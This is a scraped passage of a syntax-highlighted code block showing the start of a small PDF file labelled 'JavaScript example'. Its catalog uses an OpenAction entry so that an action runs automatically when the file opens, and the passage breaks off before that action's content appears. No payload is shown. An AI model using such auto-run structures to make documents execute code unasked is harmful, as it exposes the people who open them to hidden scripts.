0000000526 00000 n  0000000650 00000 n  trailer  &lt;&lt;   \/Size 8   \/Root 1 0 R  &gt;&gt;  startxref  2504  %%EOF<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598b8a5d14412810637220-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598b8a5d14412810637220-157\">157<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-1\"><span class=\"crayon-ta\">%<\/span><span class=\"crayon-v\">PDF<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-4\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-5\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Catalog<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Outlines<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Pages<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">OpenAction<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-10\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-11\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-13\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-14\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Outlines<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-16\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-17\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-18\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-20\"><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-21\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-22\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Pages<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-23\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Kids<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-25\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-26\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-28\"><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-29\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-30\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Page<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-31\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-r\">Parent<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-32\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">MediaBox<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">612<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">792<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-33\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Contents<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-34\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Resources<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-35\"><span class=\"crayon-h\">\t\t\t <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">ProcSet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">PDF<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-36\"><span class=\"crayon-h\">\t\t\t <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Font<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">F1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-37\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-38\"><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-39\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-41\"><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-42\"><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">Length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">56<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-43\"><span class=\"crayon-e\">stream<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-44\"><span class=\"crayon-v\">BT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">F1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Tf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">700<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Td<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">TL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">JavaScript <\/span><span class=\"crayon-v\">example<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Tj <\/span><span class=\"crayon-e\">ET<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-45\"><span class=\"crayon-e\">endstream<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-46\"><span class=\"crayon-i\">endobj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-48\"><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-49\"><span class=\"crayon-o\">&lt;&lt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598b8a5d14412810637220-50\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Font<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598b8a5d14412810637220-51\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span 